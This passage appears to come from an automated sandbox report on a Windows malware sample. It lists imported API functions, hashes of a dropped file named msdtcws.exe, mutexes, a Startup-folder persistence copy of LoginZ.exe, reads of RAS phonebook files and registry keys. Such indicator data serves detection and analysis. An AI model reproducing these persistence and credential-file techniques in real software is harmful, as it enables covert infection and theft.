• 0x55f3f0 - GetEnvironmentVariableA
• 0x55f3f4 - HeapDestroy
• 0x55f3f8 - HeapCreate
• 0x55f3fc - VirtualFree
• 0x55f400 - SetEnvironmentVariableA
• 0x55f404 - LCMapStringA
• 0x55f408 - LCMapStringW
• 0x55f40c - VirtualAlloc
• 0x55f410 - IsBadWritePtr
• 0x55f414 - SetUnhandledExceptionFilter
• 0x55f418 - GetStringTypeA
• 0x55f41c - GetStringTypeW
• 0x55f420 - GetCurrentProcessId
• 0x55f424 - CompareStringA
• 0x55f428 - CompareStringW
• 0x55f42c - IsBadReadPtr
• 0x55f430 - IsBadCodePtr
• 0x55f434 - IsValidLocale
• 0x55f438 - IsValidCodePage
• 0x55f43c - EnumSystemLocalesA
• 0x55f440 - GetLocaleInfoW
• 0x55f444 - lstrcmpA
库 USER32.dll:
• 0x55f4f8 - ReleaseCapture
• 0x55f4fc - SetTimer
• 0x55f500 - KillTimer
• 0x55f504 - WinHelpA
• 0x55f508 - LoadBitmapA
• 0x55f50c - CopyRect
• 0x55f510 - ChildWindowFromPointEx
• 0x55f514 - ScreenToClient
• 0x55f518 - GetCapture
• 0x55f51c - PostThreadMessageA
• 0x55f520 - GetNextDlgGroupItem
• 0x55f524 - LoadStringA
• 0x55f528 - GetMessagePos
• 0x55f52c - SetWindowRgn
• 0x55f530 - DestroyAcceleratorTable
• 0x55f534 - GetWindow
• 0x55f538 - GetActiveWindow
• 0x55f53c - SetFocus
• 0x55f540 - IsIconic
• 0x55f544 - PeekMessageA
• 0x55f548 - SetMenu
• 0x55f54c - GetMenu
• 0x55f550 - DeleteMenu
• 0x55f554 - GetSystemMenu
• 0x55f558 - DefWindowProcA
• 0x55f55c - GetClassInfoA
• 0x55f560 - IsZoomed
• 0x55f564 - PostQuitMessage
• 0x55f568 - CopyAcceleratorTableA
• 0x55f56c - GetKeyState
• 0x55f570 - TranslateAcceleratorA
• 0x55f574 - IsWindowEnabled
• 0x55f578 - ShowWindow
• 0x55f57c - SystemParametersInfoA
• 0x55f580 - LoadImageA
• 0x55f584 - EnumDisplaySettingsA
• 0x55f588 - SetCapture
• 0x55f58c - GetScrollRange
• 0x55f590 - SetScrollRange
• 0x55f594 - SetScrollPos
• 0x55f598 - SetRect
• 0x55f59c - InflateRect
• 0x55f5a0 - IntersectRect
• 0x55f5a4 - DestroyIcon
• 0x55f5a8 - PtInRect
• 0x55f5ac - OffsetRect
• 0x55f5b0 - IsWindowVisible
• 0x55f5b4 - EnableWindow
• 0x55f5b8 - ClientToScreen
• 0x55f5bc - GetWindowLongA
• 0x55f5c0 - SetWindowLongA
• 0x55f5c4 - GetSysColor
• 0x55f5c8 - SetActiveWindow
• 0x55f5cc - SetCursorPos
• 0x55f5d0 - MapDialogRect
• 0x55f5d4 - SetWindowContextHelpId
• 0x55f5d8 - CharNextA
• 0x55f5dc - GetMenuCheckMarkDimensions
• 0x55f5e0 - GetMenuState
• 0x55f5e4 - SetMenuItemBitmaps
• 0x55f5e8 - CheckMenuItem
• 0x55f5ec - MoveWindow
• 0x55f5f0 - IsDialogMessageA
• 0x55f5f4 - ScrollWindowEx
• 0x55f5f8 - SendDlgItemMessageA
• 0x55f5fc - MapWindowPoints
• 0x55f600 - AdjustWindowRectEx
• 0x55f604 - GetScrollPos
• 0x55f608 - RegisterClassA
• 0x55f60c - GetMenuItemCount
• 0x55f610 - GetMenuItemID
• 0x55f614 - CreateWindowExA
• 0x55f618 - GetClassLongA
• 0x55f61c - SetPropA
• 0x55f620 - GetPropA
• 0x55f624 - RemovePropA
• 0x55f628 - GetMessageTime
• 0x55f62c - GetLastActivePopup
• 0x55f630 - RegisterWindowMessageA
• 0x55f634 - GetWindowPlacement
• 0x55f638 - GetNextDlgTabItem
• 0x55f63c - EndDialog
• 0x55f640 - CreateDialogIndirectParamA
• 0x55f644 - LoadCursorA
• 0x55f648 - SetCursor
• 0x55f64c - EnableMenuItem
• 0x55f650 - GetSubMenu
• 0x55f654 - GetDlgCtrlID
• 0x55f658 - CreateAcceleratorTableA
• 0x55f65c - CreateMenu
• 0x55f660 - ModifyMenuA
• 0x55f664 - AppendMenuA
• 0x55f668 - CreatePopupMenu
• 0x55f66c - DrawIconEx
• 0x55f670 - CreateIconFromResource
• 0x55f674 - CreateIconFromResourceEx
• 0x55f678 - RegisterClipboardFormatA
• 0x55f67c - SetRectEmpty
• 0x55f680 - DispatchMessageA
• 0x55f684 - GetDC
• 0x55f688 - GetMessageA
• 0x55f68c - FillRect
• 0x55f690 - IsRectEmpty
• 0x55f694 - ReleaseDC
• 0x55f698 - IsChild
• 0x55f69c - DestroyMenu
• 0x55f6a0 - SetForegroundWindow
• 0x55f6a4 - GetWindowRect
• 0x55f6a8 - EqualRect
• 0x55f6ac - UpdateWindow
• 0x55f6b0 - ValidateRect
• 0x55f6b4 - InvalidateRect
• 0x55f6b8 - GetClientRect
• 0x55f6bc - GetFocus
• 0x55f6c0 - GetParent
• 0x55f6c4 - GetTopWindow
• 0x55f6c8 - PostMessageA
• 0x55f6cc - IsWindow
• 0x55f6d0 - SetParent
• 0x55f6d4 - DestroyCursor
• 0x55f6d8 - SendMessageA
• 0x55f6dc - SetWindowPos
• 0x55f6e0 - MessageBeep
• 0x55f6e4 - MessageBoxA
• 0x55f6e8 - GetCursorPos
• 0x55f6ec - GetSystemMetrics
• 0x55f6f0 - EmptyClipboard
• 0x55f6f4 - SetClipboardData
• 0x55f6f8 - OpenClipboard
• 0x55f6fc - GetClipboardData
• 0x55f700 - CloseClipboard
• 0x55f704 - wsprintfA
• 0x55f708 - WaitForInputIdle
• 0x55f70c - WindowFromPoint
• 0x55f710 - DrawFocusRect
• 0x55f714 - DrawEdge
• 0x55f718 - UnregisterClassA
• 0x55f71c - DrawFrameControl
• 0x55f720 - TranslateMessage
• 0x55f724 - LoadIconA
• 0x55f728 - GetKeyboardLayout
• 0x55f72c - GetDesktopWindow
• 0x55f730 - GetClassNameA
• 0x55f734 - GetWindowThreadProcessId
• 0x55f738 - FindWindowA
• 0x55f73c - GetDlgItem
• 0x55f740 - GetWindowTextA
• 0x55f744 - GetForegroundWindow
• 0x55f748 - ExitWindowsEx
• 0x55f74c - SetWindowTextA
• 0x55f750 - DestroyWindow
• 0x55f754 - CharUpperA
• 0x55f758 - DrawTextA
• 0x55f75c - SetWindowsHookExA
• 0x55f760 - UnhookWindowsHookEx
• 0x55f764 - GetWindowTextLengthA
• 0x55f768 - EnumChildWindows
• 0x55f76c - CallNextHookEx
• 0x55f770 - CallWindowProcA
• 0x55f774 - GetWindowDC
• 0x55f778 - GetSysColorBrush
• 0x55f77c - FrameRect
• 0x55f780 - RedrawWindow
• 0x55f784 - EnumThreadWindows
• 0x55f788 - BeginPaint
• 0x55f78c - EndPaint
• 0x55f790 - TabbedTextOutA
• 0x55f794 - GrayStringA
库 GDI32.dll:
• 0x55f04c - ExtSelectClipRgn
• 0x55f050 - ExcludeClipRect
• 0x55f054 - GetClipBox
• 0x55f058 - GetTextExtentPoint32A
• 0x55f05c - GetDeviceCaps
• 0x55f060 - GetTextColor
• 0x55f064 - CreateRoundRectRgn
• 0x55f068 - CreateEllipticRgn
• 0x55f06c - PathToRegion
• 0x55f070 - EndPath
• 0x55f074 - BeginPath
• 0x55f078 - GetWindowOrgEx
• 0x55f07c - GetViewportOrgEx
• 0x55f080 - GetWindowExtEx
• 0x55f084 - GetDIBits
• 0x55f088 - RealizePalette
• 0x55f08c - SelectPalette
• 0x55f090 - StretchBlt
• 0x55f094 - CreatePalette
• 0x55f098 - GetSystemPaletteEntries
• 0x55f09c - CreateDIBitmap
• 0x55f0a0 - DPtoLP
• 0x55f0a4 - SelectClipRgn
• 0x55f0a8 - CreatePolygonRgn
• 0x55f0ac - GetClipRgn
• 0x55f0b0 - SetStretchBltMode
• 0x55f0b4 - SetPixel
• 0x55f0b8 - CreateRectRgnIndirect
• 0x55f0bc - SetBkColor
• 0x55f0c0 - GetViewportExtEx
• 0x55f0c4 - SetBkMode
• 0x55f0c8 - LineTo
• 0x55f0cc - MoveToEx
• 0x55f0d0 - SetTextColor
• 0x55f0d4 - CreateEllipticRgnIndirect
• 0x55f0d8 - GetTextMetricsA
• 0x55f0dc - ScaleWindowExtEx
• 0x55f0e0 - SetWindowExtEx
• 0x55f0e4 - SetWindowOrgEx
• 0x55f0e8 - ScaleViewportExtEx
• 0x55f0ec - SetViewportExtEx
• 0x55f0f0 - OffsetViewportOrgEx
• 0x55f0f4 - SetViewportOrgEx
• 0x55f0f8 - SetMapMode
• 0x55f0fc - SetROP2
• 0x55f100 - SetPolyFillMode
• 0x55f104 - RestoreDC
• 0x55f108 - LPtoDP
• 0x55f10c - Rectangle
• 0x55f110 - Ellipse
• 0x55f114 - CreateCompatibleDC
• 0x55f118 - GetPixel
• 0x55f11c - BitBlt
• 0x55f120 - StartPage
• 0x55f124 - StartDocA
• 0x55f128 - DeleteDC
• 0x55f12c - EndDoc
• 0x55f130 - EndPage
• 0x55f134 - GetObjectA
• 0x55f138 - GetStockObject
• 0x55f13c - CreateFontIndirectA
• 0x55f140 - CreateSolidBrush
• 0x55f144 - FillRgn
• 0x55f148 - CreateRectRgn
• 0x55f14c - CombineRgn
• 0x55f150 - PatBlt
• 0x55f154 - CreatePen
• 0x55f158 - SelectObject
• 0x55f15c - CreatePatternBrush
• 0x55f160 - CreateBitmap
• 0x55f164 - CreateHatchBrush
• 0x55f168 - CreateBrushIndirect
• 0x55f16c - CreateDCA
• 0x55f170 - CreateCompatibleBitmap
• 0x55f174 - GetPolyFillMode
• 0x55f178 - GetStretchBltMode
• 0x55f17c - GetROP2
• 0x55f180 - SaveDC
• 0x55f184 - PtVisible
• 0x55f188 - RectVisible
• 0x55f18c - TextOutA
• 0x55f190 - ExtTextOutA
• 0x55f194 - Escape
• 0x55f198 - GetMapMode
• 0x55f19c - GetCurrentObject
• 0x55f1a0 - Arc
• 0x55f1a4 - RoundRect
• 0x55f1a8 - GetBkColor
• 0x55f1ac - DeleteObject
• 0x55f1b0 - GetBkMode
库 MSIMG32.dll:
• 0x55f44c - GradientFill
库 WINSPOOL.DRV:
• 0x55f820 - OpenPrinterA
• 0x55f824 - DocumentPropertiesA
• 0x55f828 - ClosePrinter
库 ADVAPI32.dll:
• 0x55f000 - RegCloseKey
• 0x55f004 - LookupPrivilegeValueA
• 0x55f008 - AdjustTokenPrivileges
• 0x55f00c - RegCreateKeyExA
• 0x55f010 - GetUserNameA
• 0x55f014 - OpenProcessToken
• 0x55f018 - RegQueryValueA
• 0x55f01c - RegCreateKeyA
• 0x55f020 - RegSetValueExA
• 0x55f024 - RegOpenKeyExA
• 0x55f028 - RegQueryValueExA
库 SHELL32.dll:
• 0x55f4e8 - SHGetSpecialFolderPathA
• 0x55f4ec - Shell_NotifyIconA
• 0x55f4f0 - ShellExecuteA
库 ole32.dll:
• 0x55f8b0 - StgCreateDocfileOnILockBytes
• 0x55f8b4 - CreateILockBytesOnHGlobal
• 0x55f8b8 - CoFreeUnusedLibraries
• 0x55f8bc - CoRegisterMessageFilter
• 0x55f8c0 - CoRevokeClassObject
• 0x55f8c4 - OleFlushClipboard
• 0x55f8c8 - OleIsCurrentClipboard
• 0x55f8cc - StgOpenStorageOnILockBytes
• 0x55f8d0 - CLSIDFromProgID
• 0x55f8d4 - CoGetClassObject
• 0x55f8d8 - OleRun
• 0x55f8dc - CoCreateInstance
• 0x55f8e0 - CLSIDFromString
• 0x55f8e4 - OleUninitialize
• 0x55f8e8 - OleInitialize
• 0x55f8ec - CoTaskMemFree
• 0x55f8f0 - CoTaskMemAlloc
库 OLEAUT32.dll:
• 0x55f478 - SysAllocStringByteLen
• 0x55f47c - SafeArrayGetElemsize
• 0x55f480 - VariantClear
• 0x55f484 - VariantChangeType
• 0x55f488 - SafeArrayGetUBound
• 0x55f48c - SafeArrayGetLBound
• 0x55f490 - SafeArrayGetDim
• 0x55f494 - SafeArrayUnaccessData
• 0x55f498 - SafeArrayAccessData
• 0x55f49c - SafeArrayGetElement
• 0x55f4a0 - VariantCopyInd
• 0x55f4a4 - VariantInit
• 0x55f4a8 - SysAllocStringLen
• 0x55f4ac - SysStringLen
• 0x55f4b0 - VariantTimeToSystemTime
• 0x55f4b4 - SysAllocString
• 0x55f4b8 - SafeArrayCreate
• 0x55f4bc - SysFreeString
• 0x55f4c0 - UnRegisterTypeLib
• 0x55f4c4 - OleCreateFontIndirect
• 0x55f4c8 - LoadTypeLib
• 0x55f4cc - LHashValOfNameSys
• 0x55f4d0 - RegisterTypeLib
• 0x55f4d4 - VariantCopy
库 COMCTL32.dll:
• 0x55f03c - ImageList_Destroy
• 0x55f040 - None
• 0x55f044 - _TrackMouseEvent
库 oledlg.dll:
• 0x55f8f8 - None
库 WININET.dll:
• 0x55f7a4 - InternetCanonicalizeUrlA
• 0x55f7a8 - InternetCrackUrlA
• 0x55f7ac - HttpOpenRequestA
• 0x55f7b0 - HttpSendRequestA
• 0x55f7b4 - HttpQueryInfoA
• 0x55f7b8 - InternetConnectA
• 0x55f7bc - InternetSetOptionA
• 0x55f7c0 - InternetOpenA
• 0x55f7c4 - InternetCloseHandle
• 0x55f7c8 - InternetReadFile
库 AVICAP32.dll:
• 0x55f030 - capGetDriverDescriptionA
• 0x55f034 - capCreateCaptureWindowA
库 MSVFW32.dll:
• 0x55f454 - ICOpen
• 0x55f458 - ICCompressorFree
• 0x55f45c - ICSeqCompressFrameEnd
• 0x55f460 - ICSendMessage
• 0x55f464 - ICSeqCompressFrameStart
• 0x55f468 - ICClose
• 0x55f46c - DrawDibClose
• 0x55f470 - DrawDibEnd
库 comdlg32.dll:
• 0x55f89c - ChooseColorA
• 0x55f8a0 - GetFileTitleA
• 0x55f8a4 - GetSaveFileNameA
• 0x55f8a8 - GetOpenFileNameA
投放文件
msdtcws.exe
| 文件名 | msdtcws.exe |
|---|---|
| 相关文件 |
|
| 文件大小 | 2805760 bytes |
| 文件类型 | PE32 executable (GUI) Intel 80386, for MS Windows |
| MD5 | 66229fcde650f8671f0058bf9962c358 |
| SHA1 | 45713d1ae867d9fe2b3727c31513e426da1cf724 |
| SHA256 | 1e92d42bc6fb2fceaac740e4e11c47091efbdfa86ae69d666eccb640b7979476 |
| SHA512 | 82c09cdc063a80e7dce1f93aea9931c1df8ec2dab3933ff7fc230db2c3da159cfcc0060170991126b85446a1af0f61924ae97e5268a2ad5f5f068606d6924b6f |
| Ssdeep | 24576:4yacmnB3Z2ihx4o1r/HtTl6tCA8XTTv8/ib+G1RzV1E6UnFXlJYMoZsgUlFNaEeu:4wWnp/yttTEaRYtsgUhK1HdoMY5/mo |
| Yara |
|
| VirusTotal | 搜索相关分析 |
行为分析
互斥量(Mutexes)
- ZRYK2016.com
- IESQMMUTEX_0_208
执行的命令
- C:\Program Files\Player\msdtcws.exe
创建的服务
无信息
启动的服务
无信息
进程
LoginZ.exe PID: 2532, 上一级进程 PID: 2404
msdtcws.exe PID: 2612, 上一级进程 PID: 2532
访问的文件
- C:\Users\test\AppData\Local\Temp\wininet.dll
- C:\Windows\Fonts\staticcache.dat
- C:\CAPTURE.AVI
- C:\Users\test\AppData\Local\Temp\kernel32.DLL
- C:\
- C:\hq4i7.log
- C:\Windows\System32\tzres.dll
- C:\Users\test\AppData\Local\Temp\kernel32.dll
- C:\Users\test\AppData\Local\Temp\advapi32.dll
- C:\Users\test\AppData\Local\Temp\LoginZ.exe
- C:\Program Files
- C:\Program Files\Player
- C:\Program Files\Player\msdtcws.exe
- C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LoginZ.exe
- C:\Program Files\Player\wininet.dll
- C:\Program Files\Player\kernel32.DLL
- C:\gdq01.log
- C:\Program Files\Player\kernel32.dll
- C:\Program Files\Player\advapi32.dll
- C:\Program Files\Player\rasapi32.dll
- C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
- C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
- C:\Windows\System32\ras\*.pbk
- C:\Users\test\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
- C:\Users\test\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
- C:\Program Files\Player\zrml.txt
读取的文件
- C:\Windows\Fonts\staticcache.dat
- C:\Windows\System32\tzres.dll
- C:\Users\test\AppData\Local\Temp\LoginZ.exe
- C:\Program Files\Player\msdtcws.exe
- C:\Program Files\Player\zrml.txt
修改的文件
- C:\hq4i7.log
- C:\Program Files\Player\msdtcws.exe
- C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LoginZ.exe
- C:\gdq01.log
删除的文件
- C:\hq4i7.log
- C:\gdq01.log
注册表键
- HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
- HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
- HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
- HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
- HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000804
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\a
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\SystemLink
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane1
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane2
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane3
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane4
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane5
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane6
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane7
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane8
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane9
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane10
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane11
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane12
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane13
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane14
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane15
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane16
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\System
- HKEY_CURRENT_USER\Software\Classes
- HKEY_LOCAL_MACHINE\Software\Microsoft\COM3
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled
- HKEY_CURRENT_USER\Software\Classes\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\TreatAs
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\Progid
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\ProgID\(Default)
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\(Default)
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InprocServer32
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32\InprocServer32
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32\(Default)
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32\ThreadingModel
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InprocHandler32
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InprocHandler
- HKEY_LOCAL_MACHINE\Software\Microsoft\OLE
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaxSxSHashCount
- HKEY_CURRENT_USER\Software\Microsoft\Multimedia\DrawDib
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave1
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave2
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave3
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave4
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave5
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave6
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave7
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave8
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave9
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi1
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi2
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi3
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi4
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi5
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi6
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi7
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi8
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi9
- HKEY_CURRENT_USER\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm
- HKEY_CURRENT_USER\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm\wheel
- HKEY_CURRENT_USER
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Multimedia\MIDIMap
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
- HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\msdtcws_RASMANCS
- HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\EnableFileTracing
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\EnableConsoleTracing
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\FileTracingMask
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\ConsoleTracingMask
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\MaxFileSize
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASMANCS\FileDirectory
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASAPI32\EnableFileTracing
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASAPI32\FileTracingMask
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASAPI32\EnableConsoleTracing
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msdtcws_RASAPI32\ConsoleTracingMask
